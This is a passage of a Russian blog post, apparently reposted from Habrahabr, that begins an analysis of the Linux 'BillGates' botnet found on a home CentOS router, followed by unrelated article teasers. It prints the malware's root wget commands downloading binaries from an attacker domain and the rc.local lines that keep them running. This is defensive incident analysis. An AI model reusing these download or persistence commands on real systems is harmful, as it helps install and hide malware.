Исследуем Linux Botnet «BillGates»

Все блоги / Про интернет 26 февраля 2014 471

Написал мне вчера
lfatal1ty
, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:

Скрытый текст

root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

К сожалению, процессы не додумался скопировать

Начальный анализ

Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd

«Хмм, ладно», подумал я. Полез в rootовский crontab
Читать дальше →

Источник:Хабрахабр, Информационная безопасность

Оцените публикацию

💬 Комментарии

В связи с новыми требованиями законодательства РФ (ФЗ-152, ФЗ «О рекламе») и ужесточением контроля со стороны РКН, мы отключили систему комментариев на сайте.

🔒 Важно Теперь мы не собираем и не храним ваши персональные данные — даже если очень захотим.

💡 Хотите обсудить материал?

Присоединяйтесь к нашему Telegram-каналу:

https://t.me/blogssmartz

Нажмите кнопку ниже — и вы сразу попадёте в чат с комментариями

предыдущая статья

следующая статья

Похожие публикации

Электронная коммерция изнутри. Хинты и трюки

Спикеры — Валерий Иванов, ex-руководитель интернет-магазина 320–8080.ru (ЦиFры), исполнительный директор ИМ voltovik.ru и Егор Ногтев, руководитель официального интернет-магазина «Зенит», основатель интернет-магазина www.telegorod.ru. На встрече ...

подробнее »

24 мая 2013

Занимательные задачки / Небольшой квест на тему WEB 2.0

Вашему вниманию предлагается интересный двухуровневый квест по тематике информационной безопасности в сфере технологий WEB 2.0. Сервер: http://46.4.187.243:8080/ Задача: Минимум – получить часть исходного кода серверной части приложения. Максимум – добиться выполнения своего кода на стороне

подробнее »

29 декабря 2010

«Яндекс» объявил о начале продаж колонки «Яндекс.Станция»

Пока купить её можно только в магазине в московском офисе компании.

подробнее »

9 июля 2018

«У бизнеса нет принципиальной необходимости в mPOS»

Когда-то я возглавлял отдел электронной и мобильной коммерции "Мастер-Банка", где приходилось достаточно плотно работать с крупнейшими игроками mPOS в России, так как "Мастер-Банк"подключил более пяти mPOS-решений. Чуть ранее, возглавляя IntellectMoney, мы также прорабатывали пилотные проекты по

подробнее »

6 марта 2015

Налоговая выдаст ИНН через Интернет

На сайте ФНС россии на странице « Узнать свой/чужой ИНН » появилась возможность узнать свой номер по данным из паспорта. Индивидуальный номер налогоплательщика вам может понадобиться, например, для регистрации на сайте gosuslugi.ru, которые, кстати , обновили сертификат безопасности.

подробнее »

11 сентября 2010

Путин переложил \"защиту детей\" с провайдеров на кафе с WiFi

Теперь конечные владельцы точек доступа будут нести административную ответственность за открытый доступ к "вредной" информации. Президент России Владимир Путин подписал поправку в статью 6.17 Кодекса РФ об административных правонарушениях. Это изменение накладывает ответственность за "неприменение

подробнее »

25 февраля 2013